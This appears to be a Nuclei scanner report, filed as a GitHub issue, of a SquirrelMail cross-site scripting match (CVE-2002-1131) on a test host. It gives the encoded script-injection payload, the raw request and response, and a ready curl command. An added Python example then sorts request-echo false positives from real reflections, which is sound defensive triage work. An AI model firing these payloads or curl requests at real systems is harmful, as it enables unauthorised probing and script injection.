mkrs2404 / tickets


SquirrelMail 1.2.6/1.2.7 - Cross-Site Scripting (CVE-2002-1131) found on honey.scanme.sh #28

Closed mkrs2404 closed 1 month ago

mkrs2404 commented 4 months ago

Details: CVE-2002-1131 matched at honey.scanme.sh

Protocol: HTTP

Full URL: https://honey.scanme.sh/src/addressbook.php?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E

Timestamp: Tue Apr 30 19:26:14 +0530 IST 2024

Template Information

Key Value
Name SquirrelMail 1.2.6/1.2.7 - Cross-Site Scripting
Authors dhiyaneshdk
Tags cve, cve2002, edb, xss, squirrelmail
Severity high
Description The Virtual Keyboard plugin for SquirrelMail 1.2.6/1.2.7 is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
Remediation Upgrade to a patched version of SquirrelMail or apply the necessary security patches to mitigate the XSS vulnerability.
CVSS-Metrics CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P
CWE-ID CWE-80
CVE-ID CVE-2002-1131
CVSS-Score 7.50
vendor squirrelmail
product squirrelmail

Request

GET /src/addressbook.php?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
Host: honey.scanme.sh
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/604.4.15 (KHTML, like Gecko) Version/16.4 Safari/604.4.1
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK
Connection: close
Content-Length: 315
Content-Type: text/html
Date: Tue, 30 Apr 2024 13:56:14 GMT

GET /src/addressbook.php?</script><script>alert(document.domain)</script> HTTP/1.1
Host: honey.scanme.sh
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/604.4.15 (KHTML, like Gecko) Version/16.4 Safari/604.4.1

References:

CURL command

curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/604.4.15 (KHTML, like Gecko) Version/16.4 Safari/604.4.1' 'https://honey.scanme.sh/src/addressbook.php?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

Generated by Nuclei v3.2.5
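The response body in the report is the request itself played back, with the percent-encoded query decoded and the headers reordered, served as text/html with status 200. A template that matches on the reflected string will accept that even though no SquirrelMail code is involved, so a hit on an echo endpoint (a honeypot, a debug handler, a WAF diagnostic page) needs a second look before it is filed as a vulnerability. The following added example, which is not part of this issue or of the Nuclei template, triages such a hit offline from the raw request and the response body: it distinguishes a request echo from an entity-encoded reflection and from a raw reflection that is worth confirming in a browser. The request and the three response bodies are constructed to mirror the exchange above; parse_request, is_request_echo and triage are names chosen for this example.

```python
"""Triage a reflected-XSS scanner hit: real reflection or a request-echo endpoint?

Added example, not part of this issue or of the Nuclei template. The request
and response bodies below are constructed to mirror the honey.scanme.sh
exchange in the report.
"""
import html
from urllib.parse import unquote

PAYLOAD = "</script><script>alert(document.domain)</script>"

# Constructed: the request the scanner sent (payload URL-encoded in the query).
RAW_REQUEST = (
    "GET /src/addressbook.php?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29"
    "%3C%2Fscript%3E HTTP/1.1\r\n"
    "Host: honey.scanme.sh\r\n"
    "User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)\r\n"
    "Connection: close\r\n"
    "Accept: */*\r\n"
    "Accept-Language: en\r\n"
    "Accept-Encoding: gzip\r\n\r\n"
)

# Constructed: an endpoint that plays the decoded request back as text/html.
ECHO_BODY = (
    "GET /src/addressbook.php?</script><script>alert(document.domain)</script> HTTP/1.1\n"
    "Host: honey.scanme.sh\n"
    "Accept: */*\n"
    "Accept-Encoding: gzip\n"
    "Accept-Language: en\n"
    "Connection: close\n"
    "User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)\n"
)

# Constructed: what a genuinely vulnerable page would look like.
REFLECTED_BODY = (
    '<html><body><script>var q = "</script><script>alert(document.domain)</script>";'
    "</script></body></html>"
)

# Constructed: the same page with output encoding applied (not exploitable).
ENCODED_BODY = "<html><body><p>No results for " + html.escape(PAYLOAD) + "</p></body></html>"


def parse_request(raw):
    """Return (request_line, {header: value}) from a raw HTTP/1.1 request."""
    lines = raw.replace("\r\n", "\n").strip("\n").split("\n")
    headers = {}
    for line in lines[1:]:
        if not line:
            break  # blank line ends the header block
        name, _, value = line.partition(":")
        headers[name.strip()] = value.strip()
    return lines[0], headers


def is_request_echo(request_line, headers, body, min_headers=3):
    """True when the body is our own request played back verbatim.

    The request line is checked both as sent and percent-decoded, because an
    echo service may decode the path before printing it; header order is
    ignored because the endpoint in the report reorders the headers.
    """
    if request_line not in body and unquote(request_line) not in body:
        return False
    echoed = sum(1 for k, v in headers.items() if f"{k}: {v}" in body)
    return echoed >= min(min_headers, len(headers))


def triage(raw_request, payload, body):
    """Classify a scanner hit from the raw request and the response body.

    Returns one of:
      "not-reflected"  payload never appears in the body
      "encoded"        payload appears only HTML-entity-encoded (safe)
      "request-echo"   body is a replay of the request (honeypot/debug endpoint)
      "reflected"      raw payload present and not an echo: confirm in a browser
    """
    request_line, headers = parse_request(raw_request)
    if payload not in body:
        return "encoded" if html.escape(payload) in body else "not-reflected"
    if is_request_echo(request_line, headers, body):
        return "request-echo"
    return "reflected"


if __name__ == "__main__":
    for name, body in [("echo endpoint", ECHO_BODY), ("vulnerable page", REFLECTED_BODY),
                       ("encoded output", ENCODED_BODY)]:
        print(f"{name:15s} -> {triage(RAW_REQUEST, PAYLOAD, body)}")
```

In practice a "reflected" verdict is followed by a second request carrying a random canary in an otherwise unused header; if the canary comes back in the body as well, the endpoint echoes everything and the hit belongs in the same bucket as this one. Only a reflection that survives that check, and that lands in a script or attribute context rather than inside a text dump, justifies the template's CVSS 7.5.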